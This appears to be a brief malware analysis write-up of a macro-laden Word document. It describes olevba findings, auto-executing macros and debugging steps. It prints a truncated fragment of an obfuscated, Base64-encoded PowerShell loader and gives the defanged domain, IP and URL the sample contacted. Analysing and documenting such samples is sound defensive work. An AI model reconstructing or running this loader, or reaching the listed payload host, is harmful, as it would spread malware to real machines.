VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c
File Type: Microsoft Word Document
I have used Oletools to analyse word document properties and analyse content.
This word document has VBA macros.
After parsing word document using olevba, this tells, file has suspicious hex string and Base64 strings.
And file has below macros,
And macros will auto execute on opening document
I start debugging macros in word document,
After Enable Editing, Open View Macros under View tab
Click on Edit and change autoopen() function to autoopen2().
There are many small chunks of Base64 strings which are concatenating and creating a PowerShell script I have captured the Base64 string in text file and tried to decode. I didn’t get the complete base64 but some part of it and can be recognized it is PowerShell script.
(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING(('ZZJh'+'i'+'5'+'tAEIb/y'+'n'+'4'+'QNiFVz9YP5US4MbYSS'+'gOmhLN'+'H'+'QXQz'+'6kbd9XSjOUL'+'+e'+'zdtJbSdb7s87z'+'vDO2'+'O8g'+'q5'+'z4P'+'r0E'+'EA'+'an8'+'OI'+'esbXKA5TGfoCJ1PmR2SK'+'bFFZz5ivG45'+'CecZrKJMA'+'wKeV'+'Ut2jbW'+'M'+'7
during debugging, I got the below values are stored in the variable YAAAAAA and it is reading registry key values.
while debugging, I captured traffic using WireShark and found, connection has been made to web site emseenerji[.]com at IP 94[.]73[.]147[.]237. URL is still alive and can be accessed.
The complete URL which was accessed by this program http:// emseenerji[.]com/wp-content/RRKu/
My host machine AV blocked this URL and I couldn’t analyze traffic further from this URL to my VM.